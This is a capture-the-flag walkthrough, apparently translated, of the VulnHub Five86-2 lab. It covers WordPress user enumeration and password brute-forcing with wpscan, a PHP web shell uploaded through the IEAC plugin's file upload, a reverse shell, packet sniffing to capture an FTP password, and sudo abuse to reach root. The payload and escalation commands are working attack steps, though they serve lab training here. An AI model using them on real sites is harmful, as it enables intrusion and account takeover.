Target machine address: < http://www.vulnhub.com/entry/five86-2,418/> ;
This article involves knowledge points practical exercises: related experiments: VulnHub*** test actual combat shooting range Node 1.0 (Node 1.0 is a medium-difficulty Boot2root/CTF challenge, the shooting range environment was originally created by HackTheBox, and the purpose of the experiment is to obtain two flags)
Summary of technical points
• *** for WordPress sites
- wpscan
• RCE vulnerability of IEAC plugin in WordPress
– IEAC vulnerability analysis and combined exploitation attempts of WordPress plugin
• Use of tcpdump
Target discovery
The nmap -sP parameter uses ping to scan LAN hosts, the destination address is 192.168.56.6
nmap -A 192.168.56.6 -p- can see some information of the target host, -A is for operating system fingerprint and version detection, -p- is for all ports
Open ports 22, 21, 80, and port 80 is the CMS of WordPress 5.1.4
It’s best to add 192.168.56.6 five86-2 to /etc/hosts in advance, because you will be redirected to this domain name when you visit the backend wp-admin of wordpress later.
Vulnerability discovery and exploitation
No vulnerabilities in WordPress 5.1.4 were found in searchsploit and Google. You can scan this URL with wpscan. wpscan is a scanner for WordPress. For detailed usage, please refer to the complete guide for using WPScan .
The default scan will return the middleware, XML-RPC, readme file, upload path, WP-Corn, version, theme, all plug-ins and backup files of the target site.
命令wpscan -u <http://192.168.56.6/>;
There is no useful information found here, consider enumerating user names, and then cooperate with rockyou.txt to blast the password. Blasting the username command wpscan --url < http://192.168.56.6/> --enumerate u, 5 users were found
peteradminbarneygillianstephen
Blast password command wpscan --url < http://192.168.56.6/> -U user.txt -P /usr/share/wordlists/rockyou.txt
Two results came out in the end
Username: barney, Password: spooky1Username: stephen, Password: apollo1
Use barney to log in to the background < http://five86-2/wp-admin/>, you can see that this site has three plugins installed, but only one Insert or Embed Articulate Content into WordPress Trial (IEAC) is activated
Akismet Anti-Spam Version 4.1.1Hello Dolly Version 1.7.1IEAC Version 4.2995
Search on Google look, this is not difficult to search plugin RCE: WordPress plugin IEAC vulnerability analysis and use of a combination of attempts at exploit-db on there
First generate poc.zip,
echo "hello" > index.htmlecho "<?php echo system($_GET['cmd']); ?>" > index.phpzip poc.zip index.html index.php
Then log in to the wordpress backend, select new article
Choose to add block
Choose E-Learning
Upload poc.zip
Choose Insert As iFrame
You can see the upload location, which means that the last shell location is < http://192.168.56.6/wp-content/uploads/articulate_uploads/poc/index.php> ;
Test shell< http://192.168.56.6/wp-content/uploads/articulate_uploads/poc/index.php?cmd=whoami>This will get the shell
Use php-reverse-shell to reverse the shell, visit < http://192.168.56.6/wp-content/uploads/articulate_uploads/poc4/shell.php> to see the rebound shell, which is not TTY yet, so I just want to How to become TTY
ls /home found that there are 8 directories. Two passwords have just been blasted. One is logged in to the background, and the other is not tested, and both are in these 8 users. You can try su barney first, fill in the password spooky1, and find that it fails, then try stephen, password apollo1. The shell here does not know why there is no previous $, but it can be used
In fact, the www-data here can be directly turned into TTY using python3 -c'import pty;pty.spawn("/bin/bash")', which may be more convenient
Then sudo -l found that a password is needed and it is not spooky1, so let's su stephen, and found that stephen is in a user group named pcap (Isn't pcap a traffic packet ^_^)
Then sudo -l found that sudo could not be executed
Back to pcap, does the traffic packet mean traffic analysis? Try ifconfig and find that there is no such command, but you can use ip add and find that there are several network interfaces currently running
The last interface here seems to be dynamic, and it is different every time. You can use tcpdump -D to list the interfaces available for packet capture. I chose to catch the last two here because they are not very common. The packet capture command is timeout 120 tcpdump -w 1.pcap -i veth2c37c59, where timeout 120 means 2 minutes, -w is to output the result to a file, and -i is the designated listening port
You can analyze these two traffic packets, command tcpdump -r 1.pcap, where -r reads data from a given traffic packet. It is not difficult to find the password esomepasswford of the paul user FTP. The content of 2.pcap is the same as that of 1.pcap.
Then su paul, use the above password to find that you can log in. Try sudo -l to find that stephen can use peter's service command
Then you can directly execute peter's /bin/bash. The command sudo -u peter service /bin/bash. Here we should pay attention to the directory problem, use the relative directory to find the location of /bin/bash
After obtaining the authority of peter, I still sudo -l first, and found that he can run the passwd command of the root user. Then I can directly modify the root password to obtain root authority.
It's time to perform real technology. sudo -u root passwd root (obsessive-compulsive disorder, the full text is the same), the same as sudo passwd root
Find the flag